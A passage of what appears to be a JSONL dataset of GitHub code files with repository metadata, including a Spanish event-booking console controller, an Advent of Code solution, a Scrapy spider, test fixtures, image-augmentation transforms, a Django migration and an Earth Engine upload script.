0\n for index, line in enumerate(archivo):\n linea = line.strip().split(';')\n for index2, servicio in enumerate(self.listaServiciosTemporales):\n if int(servicio) == (index+1):\n if estado == 1:\n self.vistaServicio.servicios_elegidos(linea[0])\n else:\n cont += 1\n self.vistaServicio.servicios_para_eliminar(cont, linea[0])\n break\n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\")\n \n \n def servicios_para_elegir(self):\n self.vistaServicio.titulo_menu()\n for index, servicio in enumerate(self.listaServicio):\n print(servicio.__str__(index+1))\n ingreso = 1\n total = self.total_lineas_archivo()\n if len(self.listaServiciosTemporales) > 0:\n self.vistaServicio.titulo_servicios_elegidos()\n self.servicios_elegidos(1) \n while ingreso >= 1 and ingreso <= total:\n ingreso = self.vistaServicio.ingreso_menu()\n if ingreso.isdigit():\n if ingreso != '0':\n ingreso = int(ingreso)\n if ingreso >= 1 and ingreso <= total:\n if ingreso not in self.listaServiciosTemporales :\n self.listaServiciosTemporales.append(ingreso) \n else:\n self.vistaServicio.error_valor_duplicado() \n ingresoSeguimiento = 'x'\n while ingresoSeguimiento != 'no' and ingresoSeguimiento != 'si':\n ingresoSeguimiento = self.vistaServicio.consulta_seguimiento() \n if ingresoSeguimiento.lower() == 'si':\n ingreso = 1\n self.limpiar_consola()\n self.servicios_para_elegir()\n elif ingresoSeguimiento.lower() == 'no': \n self.menu_principal()\n else:\n self.vistaServicio.error_ingreso()\n ingresoSeguimiento = 'x'\n ingreso = 1\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 1\n else:\n self.menu_principal()\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 1\n \n \n def limpiar_consola(self):\n os.system('cls') \n #os.system('clear')\n \n \n def mostrar_servicios(self):\n self.limpiar_consola()\n self.vistaServicio.titulo_menu()\n for index, servicio in enumerate(self.listaServicio):\n print(servicio.__str__(index+1))\n ingreso = 0\n while ingreso != 1: \n ingreso = self.vistaServicio.vista_atras()\n if ingreso.isdigit():\n ingreso = int(ingreso)\n if ingreso == 1:\n return \n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n \n \n \n def modificar_servicios_seleccionados(self):\n self.limpiar_consola()\n if self.listaServiciosTemporales == []:\n self.vistaServicio.seleccion_vacia()\n self.menu_principal()\n else:\n self.vistaServicio.titulo_servicios_elegidos()\n self.servicios_elegidos(2) \n estado = True\n while estado:\n ingreso = self.vistaServicio.seleccion_eliminar_servicios()\n if ingreso.isdigit():\n if ingreso == '0':\n self.menu_principal() \n else:\n if int(ingreso) > 0 and int(ingreso) <= len(self.listaServiciosTemporales): \n for index, servicio in enumerate(self.listaServiciosTemporales):\n if int(ingreso) == (index+1):\n self.listaServiciosTemporales.pop(index)\n break\n self.modificar_servicios_seleccionados()\n else:\n self.vistaServicio.error_ingreso() \n else:\n self.vistaServicio.error_ingreso()\n \n \n \n def calcular_costo(self): \n costo = 0\n for index, item in enumerate(self.listaServicio):\n for index2, servicio in enumerate(self.listaServiciosTemporales):\n if (index+1) == int(servicio):\n costo += int(item.get_costo())\n break \n total = (costo + 10000) * 1.21\n self.evento.set_costo(total)\n return costo\n \n \n \n def mostrar_costo(self, costo, total):\n self.vistaServicio.mostrar_costo(costo, '10000', total)\n ingreso = 0\n while ingreso == 0:\n ingreso = self.vistaServicio.vista_atras()\n if ingreso.isdigit():\n ingreso = int(ingreso)\n if ingreso == 1:\n return \n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n else:\n self.vistaServicio.error_ingreso()\n ingreso = 0\n \n \n \n def consultar_disponibilidad(self):\n if self.ingresoFecha == 0: \n ingreso = 1\n while str(ingreso).isdigit():\n ingreso = self.vistaEvento.ingreso_fecha()\n if ingreso.isdigit():\n if int(ingreso) >= 1 and int(ingreso) <= 31:\n for index, evento in enumerate(self.listaEvento):\n if (index+1) == int(ingreso):\n estado = evento.get_estado()\n if estado == '1':\n self.vistaEvento.evento_ocupado()\n for indexLibre, eventoLibre in enumerate(self.listaEvento):\n if indexLibre > index :\n estadoLibre = eventoLibre.get_estado()\n if estadoLibre == '0':\n ingresoLibre = 'x'\n while ingresoLibre != 'si' and ingresoLibre != 'no':\n if (indexLibre+1) < len(self.listaEvento):\n ingresoLibre = self.vistaEvento.fecha_libre_proxima(eventoLibre.get_fecha())\n if ingresoLibre.lower() == 'si':\n fecha = indexLibre+1\n self.ingresoFecha = fecha\n self.menu_principal()\n elif ingresoLibre.lower() == 'no':\n break\n elif ingresoLibre == '1':\n self.menu_principal()\n else:\n self.vistaEvento.error_ingreso()\n ingresoLibre = 'x'\n else:\n ingresoLibre = self.vistaEvento.ultima_fecha_libre(eventoLibre.get_fecha())\n if ingresoLibre.lower() == 'si':\n fecha = indexLibre+1\n self.ingresoFecha = fecha \n self.menu_principal()\n elif ingresoLibre.lower() == 'no':\n self.menu_principal()\n elif ingresoLibre == '1':\n self.menu_principal()\n else:\n self.vistaEvento.error_ingreso()\n ingresoLibre = 'x'\n else:\n fecha = index+1\n self.ingresoFecha = fecha \n ingresoReserva = 'x'\n while ingresoReserva != '1':\n ingresoReserva = self.vistaEvento.evento_guardado()\n if ingresoReserva == '1':\n self.menu_principal()\n else:\n ingreso = 'x'\n self.vistaEvento.error_ingreso() \n else: \n self.vistaEvento.error_ingreso()\n self.limpiar_consola() \n self.consultar_disponibilidad()\n else:\n self.vistaEvento.error_ingreso() \n self.limpiar_consola() \n self.consultar_disponibilidad()\n else:\n fecha = str(self.ingresoFecha)+\"/07/2023\"\n ingreso = self.vistaEvento.fecha_reservada(fecha)\n if ingreso == '1':\n self.ingresoFecha = 0\n self.limpiar_consola()\n self.consultar_disponibilidad()\n else:\n return\n \n \n \n def carga_nombre(self):\n ingreso = 1\n while ingreso == 1:\n nombre = self.vistaCliente.carga_nombre()\n if nombre.isspace() or len(nombre) == 0:\n self.vistaCliente.error_ingreso()\n elif nombre != '1': \n self.cliente.set_nombre(nombre)\n ingreso = 0\n else:\n self.menu_principal()\n \n \n \n def carga_apellido(self):\n ingreso = 1\n while ingreso == 1:\n apellido = self.vistaCliente.carga_apellido()\n if apellido.isspace() or apellido.isdigit() or len(apellido) == 0:\n self.vistaCliente.error_ingreso()\n elif apellido != '1': \n self.cliente.set_apellido(apellido)\n ingreso = 0\n else:\n self.menu_principal()\n \n \n \n def carga_dni(self):\n ingreso = 1\n while ingreso == 1:\n dni = self.vistaCliente.carga_dni()\n if dni.isspace() or len(dni) == 0:\n self.vistaCliente.error_ingreso()\n elif dni != '1': \n estado = self.verifica_dni(dni)\n if estado: \n self.vistaCliente.dni_usado()\n self.menu_principal()\n else:\n self.cliente.set_dni(dni)\n ingreso = 0\n else:\n self.menu_principal() \n \n \n \n def verifica_dni(self, dni):\n estado = False\n for evento in self.listaEvento: \n if evento.get_cliente() == dni:\n estado = True\n return estado\n \n \n \n def carga_telefono(self):\n ingreso = 1\n while ingreso == 1:\n telefono = self.vistaCliente.carga_telefono()\n if telefono.isspace() or len(telefono) == 0:\n self.vistaCliente.error_ingreso()\n elif telefono != '1': \n self.cliente.set_telefono(telefono)\n ingreso = 0\n else:\n self.menu_principal() \n \n \n \n def carga_direccion(self):\n ingreso = 1\n while ingreso == 1:\n direccion = self.vistaCliente.carga_direccion()\n if direccion.isspace() or len(direccion) == 0:\n self.vistaCliente.error_ingreso()\n elif direccion != '1': \n self.cliente.set_direccion(direccion)\n ingreso = 0\n else:\n self.menu_principal() \n \n \n \n def carga_senia(self): \n self.calcular_costo()\n ingreso = 1\n while ingreso == 1:\n reserva = self.vistaEvento.senia_evento(self.evento.calcular_senia(), self.evento.get_costo())\n if reserva.isdigit():\n if int(reserva) != self.evento.calcular_senia() and reserva != '1':\n self.vistaEvento.error_senia()\n elif reserva != '1': \n estado = self.verificar_datos_ingresados()\n if estado:\n self.menu_principal()\n else:\n self.ingresoSenia = reserva\n self.cargar_evento() \n self.cargar_cliente()\n self.vistaEvento.reserva_exito()\n self.reset_variables()\n ingreso = 0\n else:\n self.menu_principal() \n else:\n self.vistaEvento.error_senia()\n \n \n \n def verificar_datos_ingresados(self):\n estado = False\n if self.cliente.get_nombre() == '' or self.cliente.get_apellido() == '' or self.cliente.get_telefono() == '' or self.cliente.get_direccion() == '' or self.cliente.get_dni() == '':\n self.vistaEvento.error_documentacion()\n estado = True\n if self.listaServiciosTemporales == []:\n self.vistaServicio.error_documentacion()\n estado = True\n if self.ingresoFecha == 0:\n self.vistaEvento.error_documentacion()\n estado = True\n return estado\n \n \n \n def cargar_evento(self):\n try:\n with open(\"eventos.txt\", \"r+\") as archivo:\n lineas = archivo.readlines()\n lineas_modificadas = []\n for index, linea in enumerate(lineas):\n if index == (self.ingresoFecha-1):\n if self.ingresoFecha < 10 :\n fecha = \"0\" + str(self.ingresoFecha) + \"/07/2023\"\n else:\n fecha = str(self.ingresoFecha) + \"/07/2023\"\n lineas_modificadas.append(str(fecha)+\";\"+ str(self.cliente.get_dni())+\";\"+ str(self.listaServiciosTemporales)+\";\"+self.ingresoSenia+\";\"+ str(self.evento.get_costo())+\";\"+ \"1\\n\")\n else:\n lineas_modificadas.append(linea) \n archivo.seek(0) \n archivo.writelines(lineas_modificadas)\n archivo.truncate() \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\") \n \n \n \n def cargar_cliente(self):\n try:\n with open(\"clientes.txt\", \"a+\") as archivo:\n lineas = archivo.readlines()\n estado = False\n for linea in lineas:\n campos = linea.split(\";\")\n if campos[2].strip().split(\".\") == self.cliente.get_dni().strip().split(\".\"):\n estado = True\n if estado == False:\n nueva_linea = f\"{self.cliente.get_nombre()};{self.cliente.get_apellido()};{self.cliente.get_dni()};{self.cliente.get_direccion()};{self.cliente.get_telefono()}\\n\"\n archivo.write(nueva_linea) \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\") \n \n \n \n def cancelar_evento(self):\n self.limpiar_consola()\n dni = self.vistaCliente.carga_dni()\n estado = False\n if dni != '1':\n for evento in self.listaEvento:\n if evento.get_cliente() == dni:\n estado = True\n estadoVerificacion = self.verificar_cancelacion(evento.get_fecha())\n if estadoVerificacion: \n self.vistaEvento.fecha_evento(evento.get_fecha())\n valueCancel = 'x'\n while valueCancel == 'x':\n estadoCancelacion = self.vistaEvento.cancelacion_evento()\n if estadoCancelacion.lower() == 'si': \n self.calcular_costo() \n monto = self.calcular_devolucio(evento.get_cliente())\n self.vistaEvento.devolucion_reserva(str(monto), evento.get_senia())\n self.vistaEvento.confirmacion_cancelacion()\n self.eliminar_evento(evento.get_fecha())\n self.reset_variables()\n valueCancel = 'ok'\n return \n elif estadoCancelacion.lower() == 'no':\n return\n else:\n valueCancel = 'x'\n self.vistaEvento.error_ingreso()\n else: \n self.vistaEvento.cancelacion_fuera_fecha(evento.get_fecha())\n estadoCancelacion = self.vistaEvento.cancelacion_evento()\n if estadoCancelacion.lower() == 'si': \n self.eliminar_evento(evento.get_fecha())\n self.reset_variables()\n valueCancel = 'ok'\n return \n elif estadoCancelacion.lower() == 'no':\n return\n else:\n valueCancel = 'x'\n self.vistaEvento.error_ingreso() \n self.cancelar_evento() \n \n if estado == False:\n ingreso = self.vistaEvento.error_buscar_dni()\n if ingreso == '1':\n self.limpiar_consola()\n self.cancelar_evento()\n else:\n self.menu_principal() \n else:\n self.menu_principal()\n \n \n \n def calcular_devolucio(self, dni):\n for evento in self.listaEvento: \n if dni in evento.get_cliente():\n return float(evento.get_senia())*0.20 \n\n \n \n def verificar_cancelacion(self, fecha):\n try: \n fechaActual = date.today()\n fechaEvento = datetime.strptime(fecha, \"%d/%m/%Y\").date()\n diferencia = abs((fechaActual - fechaEvento).days)\n fechaActual_str = fechaActual.strftime(\"%d/%m/%Y\")\n fechaEvento_str = fechaEvento.strftime(\"%d/%m/%Y\")\n if diferencia >= 15:\n return True\n else: \n return False\n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\") \n\n\n\n def eliminar_evento(self, fecha): \n try:\n with open(\"eventos.txt\", \"r+\") as archivo:\n lineas = archivo.readlines()\n lineas_modificadas = []\n for index, linea in enumerate(lineas):\n campos = linea.strip().split(\";\")\n fechaRegistrada = campos[0]\n if fechaRegistrada == fecha: \n if index < 9 :\n fecha = \"0\" + str(index + 1) + \"/07/2023\"\n else:\n fecha = str(index + 1) + \"/07/2023\"\n lineas_modificadas.append(str(fecha)+\";\"+\"0\"+\";\"+\"0\"+\";\"+\"0\"+\";\"+\"0\"+\";\"+\"0\\n\")\n else:\n lineas_modificadas.append(linea) \n archivo.seek(0) \n archivo.writelines(lineas_modificadas)\n archivo.truncate() \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\") \n\n\n\n def verificar_reserva(self): \n self.limpiar_consola()\n estado = True\n while estado: \n dni = self.vistaCliente.carga_dni()\n if dni == \"1\":\n self.menu_principal()\n elif dni.isdigit():\n estadoDni = True\n for evento in self.listaEvento:\n if dni == evento.get_cliente():\n estadoDni = False\n self.vistaCliente.evento_reservado(evento.get_fecha())\n cont = 0\n for index, servicio in enumerate(self.listaServicio):\n for i in evento.get_servicio():\n if str(index+1) == i:\n cont += 1\n self.vistaServicio.servicios_para_eliminar(cont, servicio.get_nombre())\n break\n if estadoDni:\n estado3 = True\n while estado3: \n ingreso2 = self.vistaCliente.error_sin_evento()\n if ingreso2 == \"1\":\n self.verificar_reserva()\n elif ingreso2 == \"0\":\n self.menu_principal()\n else:\n self.vistaEvento.error_ingreso()\n estado2 = True \n while estado2:\n ingreso = self.vistaCliente.vista_atras()\n if ingreso == \"1\":\n self.menu_principal()\n else:\n self.vistaCliente.error_ingreso()\n else:\n self.vistaCliente.error_ingreso()", "repo_name": "EmmaCanelo/TrabajoIntegradorConjunto", "sub_path": "Controllers/ControllerPrincipal.py", "file_name": "ControllerPrincipal.py", "file_ext": "py", "file_size_in_byte": 29041, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Models.Servicio.Servicio", "line_number": 14, "usage_type": "call"}, {"api_name": "Models.Evento.Evento", "line_number": 15, "usage_type": "call"}, {"api_name": "Models.Cliente.Cliente", "line_number": 16, "usage_type": "call"}, {"api_name": "Views.VistaCliente.VistaCliente", "line_number": 17, "usage_type": "call"}, {"api_name": "Views.VistaPrincipal.VistaPrincipal", "line_number": 18, "usage_type": "call"}, {"api_name": "Views.VistaServicio.VistaServicio", "line_number": 19, "usage_type": "call"}, {"api_name": "Views.VistaEvento.VistaEvento", "line_number": 20, "usage_type": "call"}, {"api_name": "Models.Servicio.Servicio", "line_number": 29, "usage_type": "call"}, {"api_name": "Models.Evento.Evento", "line_number": 30, "usage_type": "call"}, {"api_name": "Models.Cliente.Cliente", "line_number": 31, "usage_type": "call"}, {"api_name": "Views.VistaCliente.VistaCliente", "line_number": 32, "usage_type": "call"}, {"api_name": "Views.VistaPrincipal.VistaPrincipal", "line_number": 33, "usage_type": "call"}, {"api_name": "Views.VistaServicio.VistaServicio", "line_number": 34, "usage_type": "call"}, {"api_name": "Views.VistaEvento.VistaEvento", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "Models.Servicio.Servicio", "line_number": 114, "usage_type": "call"}, {"api_name": "Models.Evento.Evento", "line_number": 128, "usage_type": "call"}, {"api_name": "os.system", "line_number": 207, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 594, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 594, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 595, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 595, "usage_type": "name"}]} +{"seq_id": "36628580274", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 16 07:32:33 2020\n\n@author: Nino\n\"\"\"\n\nimport re\nimport numpy as np\nfrom collections import defaultdict\nfrom time import time\n\n\n# =============================================================================\n# FUNCTIONS\n# =============================================================================\n\ndef load_input(fname):\n with open(fname, 'r') as f:\n data = f.read().split('\\n\\n')\n return data\n\n\ndef parse_input(fields, my_ticket, nearby_tickets):\n # get fields, and valid ranges\n valid_fields = {}\n for field in fields.split('\\n'):\n field_name, value_ranges = field.split(': ')\n value_ranges = list(map(int, re.findall(r'\\d+', value_ranges)))\n set_of_values1 = set(range(value_ranges[0], value_ranges[1]+1))\n set_of_values2 = set(range(value_ranges[2], value_ranges[3]+1))\n valid_fields[field_name] = set_of_values1 | set_of_values2\n\n # get my ticket values\n _, list_of_strings = my_ticket.split('\\n')\n my_ticket_numbers = list(map(int, list_of_strings.split(',')))\n\n # get nearby tickets\n ticket_numbers = []\n for ticket in nearby_tickets.split('\\n'):\n extracted_tickets = list(map(int, re.findall(r'\\d+', ticket)))\n if extracted_tickets: ticket_numbers.append(extracted_tickets)\n \n return valid_fields, my_ticket_numbers, ticket_numbers\n\n\ndef find_valid_tickets(ticket_fields, nearby_tickets):\n all_valid_field_values = set.union(*ticket_fields.values())\n valid_tickets = []\n invalid_sum = 0\n for ticket in nearby_tickets:\n not_posibru = list(set(ticket).difference(all_valid_field_values))\n if not_posibru: invalid_sum += sum(not_posibru)\n else: valid_tickets.append(ticket)\n return valid_tickets, invalid_sum\n\n\ndef connect_values_with_ticket_fields(ticket_fields, valid_tickets):\n # numpy, yay! I can just transpose the matrix\n valid_tickets = np.array(valid_tickets)\n\n # find which number indices are valid for each field\n valid_idx = defaultdict(set)\n for idx, list_of_numbers in enumerate(valid_tickets.T):\n set_of_numbers = set(list_of_numbers)\n for field, valid_range in ticket_fields.items():\n if set_of_numbers.issubset(valid_range):\n valid_idx[field].add(idx)\n\n # find which field value corresponds to which index\n sorted_valid_idx = sorted(valid_idx.items(), key=lambda x: x[1])\n not_it = set()\n for field, idx in sorted_valid_idx:\n valid_idx[field] = valid_idx[field].difference(not_it)\n not_it.update(idx)\n \n return valid_idx\n\n\ndef define_my_ticket(valid_idx):\n my_prod = 1 \n for field, idx in valid_idx.items():\n if field[:6] == 'depart':\n my_prod *= my_ticket[list(idx)[0]]\n return my_prod\n\n\n# =============================================================================\n# MAIN\n# =============================================================================\n\nmsStart = time()\ndata = load_input('input.txt')\nticket_fields, my_ticket, nearby_tickets = parse_input(*data)\nvalid_tickets, invalid_sum = find_valid_tickets(ticket_fields, nearby_tickets)\nvalid_idx = connect_values_with_ticket_fields(ticket_fields, valid_tickets)\nmy_prod = define_my_ticket(valid_idx)\n\nprint(f'Solution to part 1: {invalid_sum}')\nprint(f'Solution to part 2: {my_prod}')\nprint(f'Run time: {time() - msStart:.3f} s')\n", "repo_name": "NKrvavica/Advent-of-Code-2020", "sub_path": "Day16/day16.py", "file_name": "day16.py", "file_ext": "py", "file_size_in_byte": 3407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.findall", "line_number": 29, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 63, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "41787567245", "text": "from __future__ import absolute_import, division, unicode_literals\n\nfrom scrapy.http import Request\n\nfrom .hayneedle import HayneedleProductSpider\n\n\nclass HayneedleShelfPagesSpider(HayneedleProductSpider):\n name = 'hayneedle_shelf_urls_products'\n allowed_domains = [\"www.hayneedle.com\"]\n\n def __init__(self, *args, **kwargs):\n kwargs.pop('quantity', None)\n self.current_page = 1\n self.num_pages = int(kwargs.pop('num_pages', 1))\n\n super(HayneedleShelfPagesSpider, self).__init__(\n *args,\n **kwargs)\n\n self.product_url = self.product_url.replace('\\'', '')\n\n def start_requests(self):\n yield Request(\n url=self.product_url,\n meta={'remaining': self.quantity, 'search_term': ''},\n dont_filter=True\n )\n\n def _scrape_next_results_page_link(self, response):\n if self.current_page >= self.num_pages:\n return\n self.current_page += 1\n return super(HayneedleShelfPagesSpider, self)._scrape_next_results_page_link(response)\n\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "product-ranking/product_ranking/spiders/hayneedle_shelf_pages.py", "file_name": "hayneedle_shelf_pages.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "hayneedle.HayneedleProductSpider", "line_number": 8, "usage_type": "name"}, {"api_name": "scrapy.http.Request", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "28632404564", "text": "import pytest\n\nfrom httpx import AsyncClient\n\nfrom app import create_app\nfrom fastapi.testclient import TestClient\n\n@pytest.fixture\ndef app():\n yield create_app(\"test\")\n\n@pytest.fixture\ndef client(app):\n client = TestClient(app)\n yield client\n\n@pytest.fixture\nasync def async_client(app):\n async with AsyncClient(app=app, base_url=\"http://\") as client:\n yield client\n", "repo_name": "Shawydu/task", "sub_path": "server/app/test/fixtures.py", "file_name": "fixtures.py", "file_ext": "py", "file_size_in_byte": 387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.create_app", "line_number": 10, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 8, "usage_type": "attribute"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "httpx.AsyncClient", "line_number": 19, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "72324618753", "text": "from typing import Optional\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n# 3.8 first try自己还记得Floyd's Cycle Detection Algo\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n # use slow & fast pointers to check if there's a cycle\n if not head or not head.next:\n return\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n break\n if not slow == fast:\n return\n # add another slow at the begining to find where the cycle begins\n slow2 = head\n while slow != slow2:\n slow = slow.next\n slow2 = slow2.next\n return slow", "repo_name": "deezeey/LC", "sub_path": "src/solutions/142_linked-list-cycle-ii.py", "file_name": "142_linked-list-cycle-ii.py", "file_ext": "py", "file_size_in_byte": 856, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "13335380693", "text": "import numpy as np\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\n\n\nIMAGE_HEIGHT = 480\nIMAGE_WIDTH = 640\n\ndef train_transform():\n print(\"####################################\")\n print(\"Apply transformation on train dataset\")\n print(\"####################################\")\n transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.Rotate(limit=35, p=1.0),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.Normalize(\n mean=[0.0, 0.0, 0.0],\n std=[1.0, 1.0, 1.0],\n max_pixel_value=255.0,\n ),\n ToTensorV2(),\n ],\n )\n\n return transform\n\n\ndef val_transform():\n print(\"####################################\")\n print(\"Apply transformation on valid dataset\")\n print(\"####################################\")\n transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.Normalize(\n mean=[0.0, 0.0, 0.0],\n std=[1.0, 1.0, 1.0],\n max_pixel_value=255.0,\n ),\n ToTensorV2(),\n ],\n )\n\n return transform\n\n", "repo_name": "spradier/pfe", "sub_path": "fisheyes/transformations.py", "file_name": "transformations.py", "file_ext": "py", "file_size_in_byte": 1228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "albumentations.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "albumentations.Resize", "line_number": 15, "usage_type": "call"}, {"api_name": "albumentations.Rotate", "line_number": 16, "usage_type": "call"}, {"api_name": "albumentations.HorizontalFlip", "line_number": 17, "usage_type": "call"}, {"api_name": "albumentations.VerticalFlip", "line_number": 18, "usage_type": "call"}, {"api_name": "albumentations.Normalize", "line_number": 19, "usage_type": "call"}, {"api_name": "albumentations.pytorch.ToTensorV2", "line_number": 24, "usage_type": "call"}, {"api_name": "albumentations.Compose", "line_number": 35, "usage_type": "call"}, {"api_name": "albumentations.Resize", "line_number": 37, "usage_type": "call"}, {"api_name": "albumentations.Normalize", "line_number": 38, "usage_type": "call"}, {"api_name": "albumentations.pytorch.ToTensorV2", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "4783924558", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Association',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('logotype', models.ImageField(upload_to=b'profile_images', blank=True)),\n ('url', models.URLField()),\n ('email', models.EmailField(max_length=75)),\n ('penyanumber', models.IntegerField(default=0)),\n ('adress', models.CharField(max_length=256)),\n ('city', models.CharField(max_length=128)),\n ('telephone', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n", "repo_name": "erueloi/Assocr", "sub_path": "assocr/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.EmailField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "691872285", "text": "# bbest@Benjamins-MacBook-Air ~ % /opt/homebrew/bin/python3\n\n# which pip # /opt/homebrew/bin/pip\n# pip3 install earthengine-api --upgrade\nimport ee\nfrom google.auth.transport.requests import AuthorizedSession\n\n# https://developers.google.com/earth-engine/Earth_Engine_asset_from_cloud_geotiff\n\nee.Authenticate() # or !earthengine authenticate --auth_mode=gcloud\nsession = AuthorizedSession(ee.data.get_persistent_credentials())\n\nee.Initialize()\nprint(ee.Image(\"NASA/NASADEM_HGT/001\").get(\"title\").getInfo())\n\n\n\n# old\n\nimport json\nfrom pprint import pprint\n\n# Request body as a dictionary.\nrequest = {\n 'type': 'IMAGE',\n 'gcs_location': {\n 'uris': ['gs://ee-docs-demos/COG_demo.tif']\n },\n 'properties': {\n 'source': 'https://code.earthengine.google.com/d541cf8b268b2f9d8f834c255698201d'\n },\n 'startTime': '2016-01-01T00:00:00.000000000Z',\n 'endTime': '2016-12-31T15:01:23.000000000Z',\n}\n\npprint(json.dumps(request))\n\n# Earth Engine enabled Cloud Project.\nproject_folder = 'your-project'\n# A folder (or ImageCollection) name and the new asset name.\nasset_id = 'cog-collection/your-cog-asset'\n\nurl = 'https://earthengine.googleapis.com/v1alpha/projects/{}/assets?assetId={}'\n\nresponse = session.post(\n url = url.format(project_folder, asset_id),\n data = json.dumps(request)\n)\n\npprint(json.loads(response.content))", "repo_name": "offshorewindhabitat/scripts", "sub_path": "gee_upload.py", "file_name": "gee_upload.py", "file_ext": "py", "file_size_in_byte": 1328, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ee.Authenticate", "line_number": 10, "usage_type": "call"}, {"api_name": "google.auth.transport.requests.AuthorizedSession", "line_number": 11, "usage_type": "call"}, {"api_name": "ee.data.get_persistent_credentials", "line_number": 11, "usage_type": "call"}, {"api_name": "ee.data", "line_number": 11, "usage_type": "attribute"}, {"api_name": "ee.Initialize", "line_number": 13, "usage_type": "call"}, {"api_name": "ee.Image", "line_number": 14, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": 